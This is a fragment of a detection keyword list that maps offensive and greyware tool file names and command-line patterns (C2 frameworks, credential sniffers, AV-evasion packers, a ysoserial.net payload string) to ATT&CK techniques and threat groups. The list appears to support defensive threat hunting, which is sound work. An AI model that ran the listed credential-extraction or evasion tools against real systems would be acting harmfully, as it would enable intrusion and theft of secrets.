T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.POWERSHELL*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.SHELLCODE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadFormat.SVC_EXE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*payloadgenerator.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*payloads/Follina*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*payloads/Powershell*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*payloads/shellcodes*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*payloads_examples*calc.js*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*payloads_examples*calc.xll*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*PayloadsAllTheThings*,offensive_tool_keyword,PayloadsAllTheThings,A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! ,T1210 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Bo0oM/PayloadsAllTheThings,1,1,N/A,N/A,1,4,4,2019-02-11T06:34:14Z,2019-02-11T06:29:45Z -*PayloadService.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*--payload-type Macro*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*PayloadType.BIND_PIPE*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadType.EXTERNAL*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadType.HTTP*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*PayloadType.REVERSE_TCP*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*--payload-url */pwn.html,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/ItsNee/Follina-CVE-2022-30190-POC,1,0,N/A,N/A,1,5,0,2022-07-04T13:27:13Z,2022-06-05T13:54:04Z -*pcap_linktypes.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*pcap2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pcapfile.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*PcapXray*,offensive_tool_keyword,PcapXray,Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.,T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048,TA0001 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Srinivas11789/PcapXray,1,1,N/A,N/A,10,1501,270,2022-03-28T15:31:26Z,2017-10-02T04:47:51Z -*pcienlhnoficegnepejpfiklggkioccm*,greyware_tool_keyword,Cloud VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Pcredz -d *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*Pcredz -f *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*PCredz -f *.pcap*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Pcredz -i *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*pdbedit -L -v*,greyware_tool_keyword,pdbedit,Sets the smbpasswd listing format. It will make pdbedit list the users in the database - printing out the account fields in a format compatible with the smbpasswd file format.,T1003.003 - T1087.001,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*pdbedit -L -w*,greyware_tool_keyword,pdbedit,Enables the verbose listing format. It causes pdbedit to list the users in the database - printing out the account fields in a descriptive format,T1003.003 - T1087.001,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*PDF_Payload*Doomfist.pdf*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*pdf2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pdfcrack -f *.pdf*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PDONUT_INSTANCE*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*pe_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*pe_packer/dll_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*pe_packer/exe_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*pe_packer/main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*pe_packer\dll_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*pe_packer\exe_main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*pe_packer\main.c*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*pe_packer_exe.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*pe2sh.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*pe2shc.exe *,offensive_tool_keyword,pe_to_shellcode,Converts PE into a shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/hasherezade/pe_to_shellcode,1,0,N/A,N/A,10,2007,402,2023-08-15T14:42:12Z,2018-08-19T22:57:07Z -*pe2shc.exe*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*pe2shc_*.zip*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*Pe2Shellcode.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*PEASS-ng-master*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*peCloak*,offensive_tool_keyword,peCloak,peCloak.py (beta) - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool,T1027.002 - T1059.003 - T1140 - T1562.001,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py,1,0,N/A,N/A,1,97,39,2016-03-21T23:38:15Z,2015-08-19T14:46:50Z -*peinject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*peinjector.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PELoader/PeLoader.*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*pem2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Pennyw0rth/NetExec*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,1,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*-pentest*,offensive_tool_keyword,_,pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PentestBox*,offensive_tool_keyword,pentestbox,PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System,T1043 - T1059 - T1078 - T1082 - T1083 - T1092 - T1095 - T1102 - T1123 - T1132 - T1134 - T1135 - T1140 - T1204 - T1218 - T1219 - T1222 - T1247 - T1496 - T1497 - T1543 - T1552 - T1553 - T1574 - T1583 - T1588 - T1592 - T1596 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://pentestbox.org/fr/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PENTESTING-BIBLE*,offensive_tool_keyword,PENTESTING-BIBLE,pentest documentation - Explore more than 2000 hacking articles saved over time as PDF. BROWSE HISTORY.,T1583 - T1598 - T1596,TA0001 - TA0008 - TA0043,N/A,N/A,Exploitation tools,https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE,1,1,N/A,N/A,10,12394,2312,2023-04-03T07:40:28Z,2019-06-28T11:26:57Z -*pentest-machine*,offensive_tool_keyword,pentest-machine,Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.,T1583 - T1584 - T1580 - T1582 - T1574,TA0002 - TA0001 - TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/DanMcInerney/pentest-machine,1,1,N/A,N/A,4,315,106,2018-09-07T20:01:41Z,2015-02-26T23:57:21Z -*pentestmonkey*,offensive_tool_keyword,Github Username,github repo name - privileges exploitation and offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/pentestmonkey,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PE-Obfuscator.exe*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*PE-Obfuscator.git*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*PE-Obfuscator-main*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*Pepitoh*VBad*,offensive_tool_keyword,vbad,VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.,T1564 - T1117 - T1204 - T1070,TA0002 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/Pepitoh/Vbad,1,1,N/A,N/A,6,511,134,2017-10-15T12:56:18Z,2016-03-09T12:36:04Z -*perfdata.portswigger.net*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PerfExec.sln*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -*PerfExec-main.zip*,offensive_tool_keyword,PerfExec,PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.,T1055.001 - T1059.001 - T1059.003 - T1027.002,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/PerfExec,1,0,N/A,7,1,73,8,2023-08-02T20:53:24Z,2023-07-11T16:43:47Z -*Perform password spraying for all active users on a domain*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*Performing recursive ShadowSpray attack*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*perl nikto.pl -h*,offensive_tool_keyword,nikto,Nikto web scanner tool,T1210.001 - T1190 - T1046 - T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,0,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z 